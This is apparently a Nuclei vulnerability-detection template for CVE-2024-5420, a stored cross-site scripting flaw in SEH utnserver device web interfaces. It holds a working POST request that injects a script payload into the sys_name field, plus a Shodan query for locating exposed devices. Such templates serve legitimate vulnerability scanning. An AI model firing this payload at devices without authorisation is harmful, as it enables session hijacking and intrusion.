id: CVE-2024-5420 info: name: SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting author: bl4ckp4r4d1s3 severity: high description: | A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420. reference: - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html - https://seclists.org/fulldisclosure/2024/Jun/4 - https://nvd.nist.gov/vuln/detail/CVE-2024-5420 - http://seclists.org/fulldisclosure/2024/Jun/4 - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-oring-iap420/index.html classification: cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L cvss-score: 8.3 cve-id: CVE-2024-5420 cwe-id: CWE-79 epss-score: 0.00043 epss-percentile: 0.09509 metadata: verified: true max-request: 1 shodan-query: html:"utnserver Control Center" tags: cve,cve2024,utnserver,seh,xss,seclists http: - raw: - | POST /device/description_en.html HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact= matchers-condition: and matchers: - type: word part: body words: - 'value="“>" id="standort"' - 'Host name' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a0047304502203772586ff20e023e3628c921632bd249346687b77f949d58ff614a43503db731022100932179c4dbe46d15808e70bc7390e3a2c4cd1c40a71e9c3ee0d455769e6ca33a:922c64590222798bb761d5b6d8e72950